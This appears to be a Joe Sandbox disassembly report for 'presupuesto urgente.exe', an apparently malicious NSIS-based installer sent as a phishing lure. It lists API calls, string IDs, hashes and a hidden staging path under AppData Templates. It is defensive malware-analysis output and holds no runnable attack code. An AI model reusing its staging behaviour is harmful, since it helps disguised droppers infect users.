                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004051C0
                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405371
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                      • String ID: $M$N
                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                      • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                                                      • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                                                                                                                      • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                                                      • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                                                                                                                      • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 0040497B
                                                                                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404987
                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                                                                                                                        • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                                                                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                                                        • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                                                        • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                                                                                                                        • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                                                                        • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                                                                                                                        • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                      • String ID: (7B$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call
                                                                                                                                                      • API String ID: 2624150263-212780734
                                                                                                                                                      APIs
                                                                                                                                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet, xrefs: 004021BD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet
                                                                                                                                                      • API String ID: 542301482-3950974724
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                      APIs
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403EC5
                                                                                                                                                      • DestroyWindow.USER32 ref: 00403ED9
                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F16
                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F31
                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403FDF
                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403FE9
                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404003
                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 004040FA
                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040411B
                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 0040412D
                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404148
                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404165
                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
                                                                                                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
                                                                                                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041CE
                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404302
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                      • String ID: (7B
                                                                                                                                                      • API String ID: 184305955-3251261122
                                                                                                                                                      APIs
                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404594
                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
                                                                                                                                                      • GetSysColor.USER32(?), ref: 004045C2
                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004045E3
                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040465E
                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404665
                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404690
                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004046E4
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404700
                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                      • String ID: Call$N$YD@
                                                                                                                                                      • API String ID: 3103080414-3276248472
                                                                                                                                                      APIs
                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                      • String ID: F
                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040
                                                                                                                                                        • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                                                                        • Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
                                                                                                                                                      • wsprintfA.USER32 ref: 0040607B
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
                                                                                                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406164
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
                                                                                                                                                        • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\presupuesto urgente.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                                        • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                                      APIs
                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\presupuesto urgente.exe",00403464,C:\Users\user\AppData\Local\Temp\,76893420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                      • API String ID: 589700163-1195545107
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043C9
                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 004043E5
                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004043F1
                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 004043FD
                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404410
                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404420
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040443A
                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404444
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                      • lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                      • lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                      • SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2531174081-0
                                                                                                                                                      • Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                                                                                      • Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
                                                                                                                                                      • Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                                                                                      • Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8
                                                                                                                                                      APIs
                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EAB
                                                                                                                                                      • wsprintfW.USER32 ref: 00402ED9
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F0B
                                                                                                                                                        • Part of subcall function 00402E56: MulDiv.KERNEL32(00000000,00000064,0005D5FB), ref: 00402E6B
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                      • String ID: ... %d%%
                                                                                                                                                      • API String ID: 722711167-2449383134
                                                                                                                                                      • Opcode ID: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                                                                                                      • Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
                                                                                                                                                      • Opcode Fuzzy Hash: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
                                                                                                                                                      • Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
                                                                                                                                                      • GetMessagePos.USER32 ref: 00404D01
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D1B
                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                      • String ID: f
                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                      • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                      • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(?), ref: 00401DB6
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                      • String ID: Tahoma
                                                                                                                                                      • API String ID: 3808545654-3580928618
                                                                                                                                                      • Opcode ID: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                                                                                                                      • Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
                                                                                                                                                      • Opcode Fuzzy Hash: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
                                                                                                                                                      • Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D
                                                                                                                                                      APIs
                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                                                                                                      • wsprintfW.USER32 ref: 00402E29
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E39
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                                                                      • Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                                                                                      • Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
                                                                                                                                                      • Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                                                                                      • Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8113998987.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8114063244.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.8114087670.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                      • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                                      • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                                                                                      • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                                      • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402950
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                      • Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                                                                                      • Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
                                                                                                                                                      • Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                                                                                      • Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                                                                      • wsprintfW.USER32 ref: 00404C7A
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
